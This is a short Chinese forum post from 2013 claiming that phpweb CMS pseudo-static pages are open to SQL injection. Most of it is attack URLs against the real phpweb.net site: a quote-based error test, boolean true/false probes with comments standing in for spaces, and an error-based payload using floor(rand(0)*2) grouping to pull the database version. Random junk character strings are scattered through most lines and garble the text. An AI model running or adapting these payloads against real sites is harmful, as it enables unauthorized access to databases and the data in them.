phpweb所有的整站程序伪静态页面都存在sql注入: X( G/ Y/ w# n' Z
7 d2 ?: K( J2 G3 M+ w
主站:http://phpweb.net/" k* f9 A! z; e% H
加’检测:
' h; @# g1 ^- T8 x! h6 Z5 [ - G4 T ^) J. c! Z& m0 [
http://www.phpweb.net/down/html/?772′.html
5 \: |' c M# d- `* |) L8 Q6 _" x- G
5 b b, d4 K3 r$ b1 C j出错
; j @' S4 U0 r6 W存在注入。
, a0 m+ {. P% R2 \; M不能用空格,只能用/*罗
7 I ^: r2 ]* l2 B# nhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
! M- [5 [9 E, Y3 q
/ L5 f) a C( l2 ^3 |http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
( ?6 f4 p- p4 L$ j z+ M爆数据库版本:
% R7 P7 |! Z6 q $ k" g; w3 V/ y- s! h; `+ c5 G# t
?
; B6 \. Q6 O1 ?2 q/ Y) i8 g& f B1; y* R0 e; t) g c
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html2 W* Z- [% n% G2 K
更新日期: 2013-01-03 13:39:50
) p ^) ~, T3 S, G7 y3 W |
发表于 2013-1-4 19:46:42
收藏
支持
反对